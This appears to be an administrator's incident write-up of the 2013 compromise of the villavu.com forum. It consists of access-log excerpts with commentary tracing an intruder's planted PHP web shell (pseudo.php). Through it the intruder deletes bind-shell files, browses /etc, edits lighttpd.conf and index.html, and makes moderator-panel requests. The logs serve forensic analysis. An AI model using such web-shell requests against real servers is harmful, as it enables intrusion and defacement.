91.236.116.109 villavu.com - [05/Jul/2013:20:45:20 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c HTTP/1.1" 200 247699 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:21 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:41 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/ HTTP/1.1" 200 14020 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:42 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:42 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:42 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:44 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:44 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:45 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/ HTTP/1.1" 200 247699 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/tmp/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:45 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp HTTP/1.1" 200 246507 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

This is followed by lots of actions on forum/ajax.php; I have not yet figured out what he was doing there.

..
91.236.116.109 villavu.com - [05/Jul/2013:22:13:35 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=1383" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:13:51 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=19" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:05 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=45543" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=5" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Finally, he seems to remove some traces:

91.236.116.109 villavu.com - [05/Jul/2013:22:14:30 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/ HTTP/1.1" 200 195414 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:30 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:31 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:31 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:10 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/forum.php?do=modify" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 246507 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:16:02 +0200] "GET /forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/vbsso/logs/ HTTP/1.1" 200 14191 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:16:02 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:16:02 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Now comes a more interesting part: he tries(?) to edit the /etc/lighttpd/lighttpd.conf file, followed by a restart of the lighttpd server, apparently by a user with ID=0 (root?).

91.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/ HTTP/1.1" 200 28154 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:09 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:09 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/ HTTP/1.1" 200 127972 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:10 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:10 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:12 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/ HTTP/1.1" 200 17902 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:12 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:12 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:13 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf HTTP/1.1" 200 21515 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf HTTP/1.1" 200 21515 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:16 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:51 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/ HTTP/1.1" 200 28154 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:51 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:55 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:55 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 251067 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

He edits the index.html of villavu.com:

91.236.116.109 villavu.com - [05/Jul/2013:22:26:01 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/&edit=/var/www/localhost/htdocs/index.html HTTP/1.1" 200 10603 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/&view=/var/www/localhost/htdocs/index.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

This is followed by another edit to the lighttpd.conf file; lighttpd was once again restarted.

91.236.116.109 villavu.com - [05/Jul/2013:22:27:24 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 22076 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:25 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:28 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:29 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 251067 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:29 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:32 +0200] "GET /forum/ HTTP/1.1" 303 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:32 +0200] "GET /forum/forum.php HTTP/1.1" 200 37740 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "GET /forum/images/aria/misc/blog/top-highlight.png HTTP/1.1" 404 345 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "POST /forum/misc.php?show=latestposts&vsacb_resnr=5 HTTP/1.1" 200 1860 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "POST /forum/misc.php?show=posters&vsacb_resnr=5 HTTP/1.1" 200 434 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "POST /forum/misc.php?show=hottestthreads&vsacb_resnr=5 HTTP/1.1" 200 689 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:47 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:47 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 251067 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:47 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:51 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/ HTTP/1.1" 200 28154 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:52 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:53 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/ HTTP/1.1" 200 127972 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:53 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:54 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:54 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:00 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/ HTTP/1.1" 200 17902 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf HTTP/1.1" 200 22020 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
